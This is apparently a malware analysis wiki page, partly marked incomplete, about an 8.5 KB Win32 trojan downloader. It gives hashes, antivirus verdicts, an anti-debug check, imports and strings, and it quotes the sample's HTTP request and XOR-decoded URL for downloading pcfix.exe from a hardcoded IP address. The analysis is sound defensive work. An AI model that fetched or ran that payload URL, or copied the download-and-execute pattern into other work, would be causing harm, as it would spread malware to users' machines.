77f1f61ade4b3d8ea179c77a1f94e00f

From aldeid
Jump to: navigation, search

Description

Summary

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Packer

The malware is not packed

Identification

MD5 77f1f61ade4b3d8ea179c77a1f94e00f
SHA1 d663516dd0a07ed1bb3d396ab9227678b36168f6
SHA256 259543f15f315338e7589a036bd916c7a0a9011fe288b4c6ca13b0f62c0db74b
ssdeep 192:1dPCXEd553SAYT9FJtKE7g8kxJEw8oHAKIb/i:2X4mAulPih82a
imphash e6ff134ef1c2551faf58990dc90eab51
File size 8.5 KB ( 8704 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Generic29.CJAT 20140220
Ad-Aware Trojan.Generic.8003982 20140220
AntiVir TR/Rogue.8003982.3 20140220
Antiy-AVL Trojan[Downloader:HEUR]/Win32.Unknown 20140219
Avast Win32:Trojan-gen 20140220
BitDefender Trojan.Generic.8003982 20140220
Commtouch W32/Downloader-Sml!Eldorado 20140220
Comodo UnclassifiedMalware 20140220
ESET-NOD32 probably unknown NewHeur_PE 20140220
Emsisoft Trojan.Generic.8003982 (B) 20140220
F-Prot W32/Downloader-Sml!Eldorado 20140220
Fortinet NewHeur_PE 20140220
GData Trojan.Generic.8003982 20140220
Ikarus Trojan-Downloader.Win32.Small 20140220
Jiangmin TrojanDownloader.Generic.aigb 20140220
Kaspersky HEUR:Trojan-Downloader.Win32.Generic 20140220
McAfee Artemis!77F1F61ADE4B 20140220
McAfee-GW-Edition Artemis!77F1F61ADE4B 20140220
MicroWorld-eScan Trojan.Generic.8003982 20140220
NANO-Antivirus Trojan.Win32.DownloaderSml!.bdenni 20140220
Norman Downloader 20140220
Sophos Mal/Generic-S 20140220
Symantec Trojan.Gen 20140220
TrendMicro TROJ_GEN.R0CBC0OI413 20140220
TrendMicro-HouseCall TROJ_GEN.R0CBC0OI413 20140220
VIPRE Trojan-Downloader.Win32.Small!cobra (v) 20140220
nProtect Trojan.Generic.8003982 20140220
Agnitum 20140219
AhnLab-V3 20140220
Baidu-International 20140220
Bkav 20140220
ByteHero 20140220
CAT-QuickHeal 20140220
CMC 20140220
ClamAV 20140220
DrWeb 20140220
F-Secure 20140220
K7AntiVirus 20140219
K7GW 20140219
Kingsoft 20130829
Malwarebytes 20140220
Microsoft 20140220
Panda 20140220
Qihoo-360 20140220
Rising 20140219
SUPERAntiSpyware 20140220
TheHacker 20140220
TotalDefense 20140219
VBA32 20140220
ViRobot 20140220

Defensive capabilities

IsDebuggerPresent

The IsDebuggerPresent method is present in the code and detects the presence of OllyDbg

.text:01001290                 call    ds:IsDebuggerPresent
.text:01001296                 test    eax, eax
.text:01001298                 jnz     loc_100146D

Dynamic analysis

Network indicators

HTTP request to 1.234.27.146:

GET /pcfix.exe?affid=23456732-34459 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 1.234.27.146
Connection: Keep-Alive

Files

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Registry keys

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Mutexes

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x1388       0x1400       6.167402    
.data      0x3000       0x784        0x600        4.493349    
.reloc     0x4000       0x400        0x400        2.738901

Strings

In the clear

Could not retrieve temporary path, exiting
Could not execute file, exiting
Check 
Could not download the URL to our target path, exiting
Downloading 
Could not create tmpfile, exiting
('8PW
700PP
```hhh
xppwpp
PSSSSSSS
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
8csm
t h|7
8csm
_^[]
Y__^[
t?!E
v	N+D$
UQPXY]Y[
CreateProcessA
OutputDebugStringA
GetTempFileNameA
GetTempPathA
IsDebuggerPresent
KERNEL32.dll
strncat
strncpy
memset
__getmainargs
_cexit
_exit
_XcptFilter
exit
_initterm
_amsg_exit
__setusermatherr
__p__commode
__p__fmode
__set_app_type
msvcrt.dll
[email protected]@YAXXZ
_controlfp
URLDownloadToFileA
urlmon.dll
InterlockedExchange
Sleep
InterlockedCompareExchange
RtlUnwind
SetUnhandledExceptionFilter
GetModuleHandleA
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
kU'9
HMXB
?Zd;
?/L[
S;uD
z?aUY
D?$?
U>c{
zc%C1
.:3q
-64OS
NKeb
1,202
[email protected]
3J4S4^4d4
505:5M5W5\5a5
6"6*63696A6M6d6o6u6
727H7m7y7
:,;:;
;$<)<H<_<
=-=:=F=N=V=b=t=
>$>*>4>=>H>V>[>a>l>s>

Additional XOR-encoded strings

The following additional XOR-encoded strings confirm the request seen during the behavioral analysis

$ ./xorsearch -i -s /data/tmp/getdown.exe http:
Found XOR 83 position 1800: http://1.234.27.146/pcfix.exe
$ strings /data/tmp/getdown.exe.XOR.83
[SNIP]
http://1.234.27.146/pcfix.exe
affid=23456732-34459
[SNIP]

IAT

KERNEL32.dll

  • CreateProcessA
  • OutputDebugStringA
  • GetTempFileNameA
  • GetTempPathA
  • IsDebuggerPresent
  • UnhandledExceptionFilter
  • GetCurrentProcess
  • TerminateProcess
  • GetSystemTimeAsFileTime
  • GetCurrentProcessId
  • GetCurrentThreadId
  • GetTickCount
  • QueryPerformanceCounter
  • GetModuleHandleA
  • SetUnhandledExceptionFilter
  • RtlUnwind
  • InterlockedCompareExchange
  • Sleep
  • InterlockedExchange

msvcrt.dll

  • __getmainargs
  • _cexit
  • _exit
  • _XcptFilter
  • exit
  • _initterm
  • _amsg_exit
  • __setusermatherr
  • __p__commode
  • __p__fmode
  • __set_app_type
  • [email protected]@YAXXZ
  • _controlfp
  • strncat
  • strncpy
  • memset

urlmon.dll

  • URLDownloadToFileA


Comments

blog comments powered by Disqus